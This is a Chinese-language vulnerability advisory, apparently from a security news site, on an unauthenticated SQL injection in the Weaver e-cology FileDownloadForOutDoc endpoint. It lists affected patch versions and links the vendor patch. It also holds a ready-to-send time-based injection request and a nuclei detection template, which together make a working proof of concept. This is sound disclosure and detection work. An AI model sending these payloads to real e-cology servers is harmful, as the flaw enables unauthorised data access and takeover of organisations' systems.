探索网络安全新技术
攀登黑客技术最高峰

泛微协同管理应用平台(e-cology) FileDownloadForOutDoc SQL注入

泛微协同管理应用平台(e-cology) FileDownloadForOutDoc SQL注入-威武网安

漏洞描述

泛微E-Cology是一款基于全新设计理念和企业级管理思想的协同管理应用平台,适用于中大型组织,提供高效的协同办公环境和丰富的扩展应用,其中 weaver.file.FileDownloadForOutDoc存在SQL注入,攻击者可以通过漏洞获取管理员权限和服务器权限。

漏洞危害

远程未授权攻击者可利用此漏洞获取敏感信息,进一步利用可能获取目标系统权限等。

影响版本

Ecology 9.x 补丁版本 < 10.58.0
Ecology 8.x 补丁版本 < 10.58.0

漏洞复现

POST /weaver/weaver.file.FileDownloadForOutDoc HTTP/1.1
Host: xxxxxx
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close        

fileid=2+WAITFOR DELAY+'0:0:9'&isFromOutImg=1

nuclei脚本

id: ecology-oa-filedownloadforoutdoc-sqli

info:
  name: EcologyOA filedownloadforoutdoc - SQL injection
  author: unknown
  severity: critical
  description: EcologyOA filedownloadforoutdoc interface has SQL injection
  tags: ecology-oa,sqli

requests:
  - raw:
      - |
        POST /weaver/weaver.file.FileDownloadForOutDoc HTTP/1.1
        Host: {{Hostname}}
        Accept: */*
        Accept-Encoding: gzip, deflate
        Accept-Language: zh-CN,zh;q=0.9
        Connection: close        

        fileid=2+WAITFOR DELAY+'0:0:5'&isFromOutImg=1
    matchers:
      - type: dsl
        dsl:
          - 'duration>=5'

修复建议

目前官方已发布安全补丁,建议受影响用户尽快将补丁版本升级至10.58及以上。https://www.weaver.com.cn/cs/securityDownload.asp

赞(0) 打赏
版权声明:本文采用知识共享 署名4.0国际许可协议 [BY-NC-SA] 进行授权
文章名称:《泛微协同管理应用平台(e-cology) FileDownloadForOutDoc SQL注入》
文章链接:https://www.wevul.com/1893.html
本站所有内容均来自互联网,只限个人技术研究,禁止商业用途,请下载后24小时内删除。

评论 抢沙发

如果文章对你有帮助 可以打赏一下文章作者

非常感谢你的打赏,我们将继续提供更多优质内容,让我们一起创建更加美好的网络世界!

支付宝扫一扫打赏

微信扫一扫打赏

登录

找回密码

注册